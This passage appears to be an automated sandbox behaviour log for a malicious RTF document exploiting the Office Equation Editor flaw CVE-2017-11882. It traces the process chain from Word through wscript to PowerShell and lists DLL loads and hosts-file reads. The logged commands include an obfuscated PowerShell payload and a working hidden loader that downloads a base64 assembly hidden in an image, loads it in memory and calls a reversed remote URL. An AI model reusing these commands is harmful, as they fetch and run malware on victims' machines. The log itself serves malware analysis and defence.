                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfReversingLabs: Detection: 50%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?D
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\someimportantmeetingsgoing.vBS" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?Dc? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?v? ? ? ? ?Gk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?G4? ? ? ? ?ZQB3? ? ? ? ?F8? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?F8? ? ? ? ?Mg? ? ? ? ?w? ? ? ? ?DI? ? ? ? ?N? ? ? ? ?? ? ? ? ?w? ? ? ? ?Dk? ? ? ? ?M? ? ? ? ?? ? ? ? ?1? ? ? ? ?C8? ? ? ? ?bgBl? ? ? ? ?Hc? ? ? ? ?XwBp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?LgBq? ? ? ? ?H? ? ? ? ?? ? ? ? ?Zw? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?BO? ? ? ? ?GU? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?E8? ? ? ? ?YgBq? ? ? ? ?GU? ? ? ? ?YwB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBO? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?Fc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?LgBE? ? ? ? ?G8? ? ? ? ?dwBu? ? ? ? ?Gw? ? ? ? ?bwBh? ? ? ? ?GQ? ? ? ? ?R? ? ? ? ?Bh? ? ? ? ?HQ? ? ? ? ?YQ? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FU? ? ? ? ?cgBs? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Fs? ? ? ? ?UwB5? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?G0? ? ? ? ?LgBU? ? ? ? ?GU? ? ? ? ?e? ? ? ? ?B0? ? ? ? ?C4? ? ? ? ?RQBu? ? ? ? ?GM? ? ? ? ?bwBk? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?F0? ? ? ? ?Og? ? ? ? ?6? ? ? ? ?FU? ? ? ? ?V? ? ? ? ?BG? ? ? ? ?Dg? ? ? ? ?LgBH? ? ? ? ?GU? ? ? ? ?d? ? ? ? ?BT? ? ? ? ?HQ? ? ? ? ?cgBp? ? ? ? ?G4? ? ? ? ?Zw? ? ? ? ?o? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bz? ? ? ? ?HQ? ? ? ? ?YQBy? ? ? ? ?HQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DY? ? ? ? ?N? ? ? ? ?Bf? ? ? ? ?FM? ? ? ? ?V? ? ? ? ?BB? ? ? ? ?FI? ? ? ? ?V? ? ? ? ?? ? ? ? ?+? ? ? ? ?D4? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?ZQBu? ? ? ? ?GQ? ? ? ? ?RgBs? ? ? ? ?GE? ? ? ? ?Zw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?n? ? ? ? ?Dw? ? ? ? ?P? ? ? ? ?BC? ? ? ? ?EE? ? ? ? ?UwBF? ? ? ? ?DJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CSEDR/022/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
